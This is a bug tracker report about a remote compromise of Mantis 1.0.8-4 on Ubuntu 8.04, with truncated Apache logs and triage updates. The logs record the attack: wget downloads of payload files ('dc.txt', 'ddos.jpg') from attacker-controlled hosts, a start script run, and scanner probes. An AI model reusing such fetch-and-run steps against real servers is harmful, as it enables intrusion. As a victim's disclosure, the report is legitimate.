mantis1.0.8-4 (ubuntu 8.04) vulnerable to remote exploit
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
mantis |
Fix Released
|
Unknown
|
|||
mantis (Ubuntu) |
Fix Released
|
High
|
Unassigned | ||
Hardy |
Fix Released
|
High
|
Unassigned | ||
Intrepid |
Invalid
|
Undecided
|
Unassigned |
Bug Description
Binary package hint: mantis
My system has been taken over.
It looks like it is a vulnerability allready reportet a year ago.
it seems like the following log lines indicate the reason how a file got deployed in /tmp
206.217.198.78 - - [09/Nov/
/mantis/
HTTP/1.0" 200 3336 "-" "-"
206.217.198.78 - - [09/Nov/
/mantis/
HTTP/1.0" 200 3295 "-" "-"
206.217.198.78 - - [09/Nov/
/mantis/
<code>
error.log
[Mon Nov 09 23:25:05 2009] [error] [client 206.183.9.211] File does
not exist: /var/www/
--23:26:18-- http://
=> `dc.txt'
Resolving g0lias.
Connecting to g0lias.
HTTP request sent, awaiting response... 200 OK
Length: 759 [text/plain]
0K 100%
56.32 MB/s
23:26:19 (56.32 MB/s) - `dc.txt' saved [759/759]
[Mon Nov 09 23:42:55 2009] [error] [client 194.109.21.230] File does
not exist: /var/www/
[Mon Nov 09 23:43:28 2009] [error] [client 193.109.122.17] request
failed: error reading the headers
--00:05:46-- http://
=> `ddos.jpg'
Resolving lordmax.host.sk... 62.168.109.150
Connecting to lordmax.
HTTP request sent, awaiting response... 200 OK
Length: 204,429 (200K) [image/jpeg]
0K .......... .......... .......... .......... .......... 25%
1.06 MB/s
50K .......... .......... .......... .......... .......... 50%
3.02 MB/s
100K .......... .......... .......... .......... .......... 75%
3.29 MB/s
150K .......... .......... .......... .......... ......... 100%
3.39 MB/s
00:05:47 (2.13 MB/s) - `ddos.jpg' saved [204429/204429]
./start.sh: 1: /#bin/bash: not found
[Tue Nov 10 00:06:43 2009] [error] [client 194.109.21.230] File does
not exist: /var/www/
[Tue Nov 10 00:08:06 2009] [error] [client 212.174.153.69] client
sent HTTP/1.1 request without hostname (see RFC2616 section 14.23):
/w00tw00t.
[Tue Nov 10 00:09:19 2009] [error] [client 194.109.21.230] File does
not exist: /var/www/
access.log
127.0.0.1 - - [09/Nov/
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2.
(internal dummy connection)"
96.57.77.197 - - [09/Nov/
/w00tw00t.
206.183.9.211 - - [09/Nov/
/mantis/
HTTP/1.1" 200 5689
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1;
en-US; rv:1.9.1.5) Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
"http://
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5)
Gecko/20091102 (CK-Finbu.com) Firefox/3.5.5"
206.183.9.211 - - [09/Nov/
/mantis/
(Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102
(CK-Finbu.com) Firefox/3.5.5"
206.217.198.78 - - [09/Nov/
/mantis/
206.217.198.78 - - [09/Nov/
/mantis/
HTTP/1.0" 200 3336 "-" "-"
206.217.198.78 - - [09/Nov/
/mantis/
HTTP/1.0" 200 3295 "-" "-"
206.217.198.78 - - [09/Nov/
/mantis/
HTTP/1.0" 200 3302 "-" "-"
206.183.9.211 - - [09/Nov/
/mantis/
(Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102
(CK-Finbu.com) Firefox/3.5.5"
127.0.0.1 - - [09/Nov/
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2.
(internal dummy connection)"
127.0.0.1 - - [09/Nov/
"-" "Apache/2.2.8 (Ubuntu) PHP/5.2.
(internal dummy connection)"
194.109.21.230 - - [09/Nov/
194.109.153.5:11111 HTTP/1.0" 302 348 "-" "-"
194.109.21.230 - - [09/Nov/
http://
"BOPM/3.1.3"
194.109.21.230 - - [09/Nov/
http://
193.109.122.38 - - [09/Nov/
72.51.18.254:6677 HTTP/1.0" 302 344 "-" "pxyscand/2.1"
193.109.122.17 - - [09/Nov/
http://
</code>
Related branches
CVE References
Changed in mantis (Ubuntu): | |
status: | New → Triaged |
importance: | Undecided → High |
visibility: | private → public |
Changed in mantis: | |
status: | Unknown → Fix Released |
I'll prepare the debdiff tonight.